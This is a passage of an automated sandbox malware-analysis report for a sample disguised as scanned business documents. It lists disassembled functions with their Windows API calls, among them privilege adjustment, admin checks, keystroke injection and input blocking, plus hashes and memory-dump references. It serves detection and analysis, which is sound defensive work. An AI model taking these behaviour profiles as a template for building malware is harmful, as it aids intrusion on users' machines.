                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002B2724
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 002B2731
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: d4ba18a0e3af6812e8870dd0e2f01599a78f4cbb5862ce695ac7372a87891ae3
                                                      • Instruction ID: 11810a97d7470df8a441a8149d4df497008a910b25301ca150ff129f54e4c8e3
                                                      • Opcode Fuzzy Hash: d4ba18a0e3af6812e8870dd0e2f01599a78f4cbb5862ce695ac7372a87891ae3
                                                      • Instruction Fuzzy Hash: A831D374951318ABCB21DF68DC887DCBBB8AF08310F5041EAE81CA7261EB349F958F44
                                                      Function 002F51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 002F51DA
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002F5238
                                                      • SetErrorMode.KERNEL32(00000000), ref: 002F52A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: b75f3d65372bed57da6787132f03bd2d1204e3a8e35b902fde291a0e5232830c
                                                      • Instruction ID: 548c18c9cdb148900bc59fcb3a55151bbea5d8850b9035a69dfc05d6dcb3bf1f
                                                      • Opcode Fuzzy Hash: b75f3d65372bed57da6787132f03bd2d1204e3a8e35b902fde291a0e5232830c
                                                      • Instruction Fuzzy Hash: C6315075A10519DFDB00DF54D884EADBBB4FF49314F1480A9E905AB3A2DB31E856CFA0
                                                      Function 002E16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0029FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 002A0668
                                                        • Part of subcall function 0029FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 002A0685
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002E170D
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002E173A
                                                      • GetLastError.KERNEL32 ref: 002E174A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                      • String ID:
                                                      • API String ID: 577356006-0
                                                      • Opcode ID: d72585e5e6d246cb3a4a100e791401026ddfb9f7e7959bfa450b6f3d0b987146
                                                      • Instruction ID: eb2effc3ccf656480191313f3bac366101120fc93514bd407c8fe00951182190
                                                      • Opcode Fuzzy Hash: d72585e5e6d246cb3a4a100e791401026ddfb9f7e7959bfa450b6f3d0b987146
                                                      • Instruction Fuzzy Hash: B811C1B2460305AFD7189F54DC86DAAB7BDFF08714B20852EE05697241EB70FC61CA20
                                                      Function 002ED5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002ED608
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002ED645
                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002ED650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: 0106b9b3f0b66ceddb8bed509a95ac2574886ed0d51b594912eb70e28411ef17
                                                      • Instruction ID: e4da727f2ebe0bb51e5246cc640d0c72c5b780b33fe7e6e65cbdd0fa7c95db08
                                                      • Opcode Fuzzy Hash: 0106b9b3f0b66ceddb8bed509a95ac2574886ed0d51b594912eb70e28411ef17
                                                      • Instruction Fuzzy Hash: 79118E75E41228BFDB108F95EC44FEFBBBCEB49B50F108121F914E7290C2704A018BA1
                                                      Function 002E1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002E168C
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002E16A1
                                                      • FreeSid.ADVAPI32(?), ref: 002E16B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: b3a43a8a7a315a1c67eecd04cc3051897feba5e006568427a1f3367379156363
                                                      • Instruction ID: eeeb873d7c4bc50cf7e08e2f6dd43fcedbc3dc7c43c6630ea00025c8e328015b
                                                      • Opcode Fuzzy Hash: b3a43a8a7a315a1c67eecd04cc3051897feba5e006568427a1f3367379156363
                                                      • Instruction Fuzzy Hash: 88F0F4719A0309FBDB00DFE49C89EAEBBBCEB08704F508565E501E2181E774EA448A50
                                                      Function 002A4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(002B28E9,?,002A4CBE,002B28E9,003488B8,0000000C,002A4E15,002B28E9,00000002,00000000,?,002B28E9), ref: 002A4D09
                                                      • TerminateProcess.KERNEL32(00000000,?,002A4CBE,002B28E9,003488B8,0000000C,002A4E15,002B28E9,00000002,00000000,?,002B28E9), ref: 002A4D10
                                                      • ExitProcess.KERNEL32 ref: 002A4D22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 04ea749e17e507b68a219b93513917bbb413b28edabb0b9a558cb7003635abb4
                                                      • Instruction ID: 343061bd79036455a15eda60b31b67f541d0a24f5b57d573277e27bb07fa4751
                                                      • Opcode Fuzzy Hash: 04ea749e17e507b68a219b93513917bbb413b28edabb0b9a558cb7003635abb4
                                                      • Instruction Fuzzy Hash: D9E0B631060548ABCF12BF54DD09A987B6DEB8A785F108414FD158A122DB79DE62CA80
                                                      Function 002DD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 002DD28C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: X64
                                                      • API String ID: 2645101109-893830106
                                                      • Opcode ID: 6a6a0a6249461d356aff15d19c76de93cf1ba62cf42e52a942b6dc453a213647
                                                      • Instruction ID: be0b8e704883cca7037cc88d2a46d1a1fe57c55a9abe051ea700f1491e361853
                                                      • Opcode Fuzzy Hash: 6a6a0a6249461d356aff15d19c76de93cf1ba62cf42e52a942b6dc453a213647
                                                      • Instruction Fuzzy Hash: 3ED0C9B482511DEBCF94CB90DC88DD9B37CBB08345F104152F546A2100D77095489F10
                                                      Function 002ACAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction ID: 27bc50317542a599bdff29f7f26e55d44601da04236965f31db51944cdf09c77
                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction Fuzzy Hash: 35023D71E102199FDF14CFA9C9806ADFBF2EF49324F25416AD819E7380DB31AE518B90
                                                      Function 0028CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable is not of type 'Object'.$p#5
                                                      • API String ID: 0-123761422
                                                      • Opcode ID: bb9020c21fc44951309b1948c74e932b7200de007240effed2b2b103539d6486
                                                      • Instruction ID: ac54d324eeaea9c242b7467ebf966b0ca5bb31c399020faeaa16f6c9a83c9e8d
                                                      • Opcode Fuzzy Hash: bb9020c21fc44951309b1948c74e932b7200de007240effed2b2b103539d6486
                                                      • Instruction Fuzzy Hash: BC329E78921219DBDF14EF90D880BEDB7B5BF05304F20805AE906AB3E2D771AD65CB60
                                                      Function 002F68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002F6918
                                                      • FindClose.KERNEL32(00000000), ref: 002F6961
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 5bc1d4819bd2a69a411133098cfd6b09dc62fcd2012e46c8b4830547b7122337
                                                      • Instruction ID: 5d59ed20f27a851f640ae147870089de6e5209ce85d8c710d793c22157ee877e
                                                      • Opcode Fuzzy Hash: 5bc1d4819bd2a69a411133098cfd6b09dc62fcd2012e46c8b4830547b7122337
                                                      • Instruction Fuzzy Hash: 1711D0356242019FD710DF29D488A26FBE4FF88328F14C6A9E5698F7A2C770EC15CB90
                                                      Function 002F37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00304891,?,?,00000035,?), ref: 002F37E4
                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00304891,?,?,00000035,?), ref: 002F37F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: d7d7f48342faca3e187573aaa29c5355850d4a7dfc3d92ac828716d0491a3401
                                                      • Instruction ID: b0023d275d7e19b3fba211de42d903819f7d1c32d5bb406272fc2108bdcc2277
                                                      • Opcode Fuzzy Hash: d7d7f48342faca3e187573aaa29c5355850d4a7dfc3d92ac828716d0491a3401
                                                      • Instruction Fuzzy Hash: EBF0EC746153192AD72067655C4DFEB769DEFC9761F000175F505D2281D5A09944C7B0
                                                      Function 002EB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002EB25D
                                                      • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 002EB270
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: ccce61c69d0a08e752fc9a9a5fb04acd33fdefcf4120921ba02cfe49e578af28
                                                      • Instruction ID: 9aeaefbbdc3b380ba3d7c859c502ab5f780fcaf15d11306eb8955724a8cdf5cb
                                                      • Opcode Fuzzy Hash: ccce61c69d0a08e752fc9a9a5fb04acd33fdefcf4120921ba02cfe49e578af28
                                                      • Instruction Fuzzy Hash: 9DF01D7185428EABDB069FA1C805BEE7BB4FF08305F009009F955A5192C37986119F94
                                                      Function 002E10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002E11FC), ref: 002E10D4
                                                      • CloseHandle.KERNEL32(?,?,002E11FC), ref: 002E10E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: 990ce90f25ef599dd8503a5666895c76798cd4da43eea0660699d3d65dea70c4
                                                      • Instruction ID: 653e853e2c18ff43f0d10cf278122a0fa844f8a962a5fe757cb6bae5fdf870ff
                                                      • Opcode Fuzzy Hash: 990ce90f25ef599dd8503a5666895c76798cd4da43eea0660699d3d65dea70c4
                                                      • Instruction Fuzzy Hash: 63E0BF72064611AFEB662B51FD05EB777ADEB08310F24C82DF5A5804B1DB62ACA0DB50
                                                      Function 002B676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002B6766,?,?,00000008,?,?,002BFEFE,00000000), ref: 002B6998
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 9c3cb4e75cb119733be5021889487b0b599e6a0a8161e4ef87d0da497d1ce878
                                                      • Instruction ID: 134dc9898d1b9a51e59d08131ba5c0fdcf6d73d60f8cccfa5f34e6adb457d32a
                                                      • Opcode Fuzzy Hash: 9c3cb4e75cb119733be5021889487b0b599e6a0a8161e4ef87d0da497d1ce878
                                                      • Instruction Fuzzy Hash: BDB16131520609DFDB15CF28C48ABA57BE0FF453A4F29C658E899CF2A1C739D9A5CB40
                                                      Function 0029B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 90e6706003c23c77b50f09d277170c006cfee5d1bfa27ece390ee85e27575d9e
                                                      • Instruction ID: 730f203d6285081aca24f9852ebda94901c87e0289dbcae9f4869d395d4d2c00
                                                      • Opcode Fuzzy Hash: 90e6706003c23c77b50f09d277170c006cfee5d1bfa27ece390ee85e27575d9e
                                                      • Instruction Fuzzy Hash: 88127D759202299BCF25CF58D9806EEB7B5FF48310F10819AE809EB251EB709E91DF90
                                                      Function 002FEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 002FEABD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: fe9bbea564ea2a745d48d6f0ddc7942c329aed132b0c04e77493c2985bec1a2c
                                                      • Instruction ID: d16d013cc68952f7ba598d85a905e3013866e678424904d6f99d8d579bce6d10
                                                      • Opcode Fuzzy Hash: fe9bbea564ea2a745d48d6f0ddc7942c329aed132b0c04e77493c2985bec1a2c
                                                      • Instruction Fuzzy Hash: 58E048352202049FD711EF59D404D9AF7DDBF58760F018426FD45C73A1D770E8508B90
                                                      Function 002A09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,002A03EE), ref: 002A09DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 0b768650fdddaa0a9ca077ae5b58cd87b2de2f011e7a691903e7b2f8cdbe7503
                                                      • Instruction ID: bb7aee30c96fddd8a70bf5c65cdd13bd212333bef56387d5f5be93e963410b24
                                                      • Opcode Fuzzy Hash: 0b768650fdddaa0a9ca077ae5b58cd87b2de2f011e7a691903e7b2f8cdbe7503
                                                      • Instruction Fuzzy Hash:
                                                      Function 002A781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
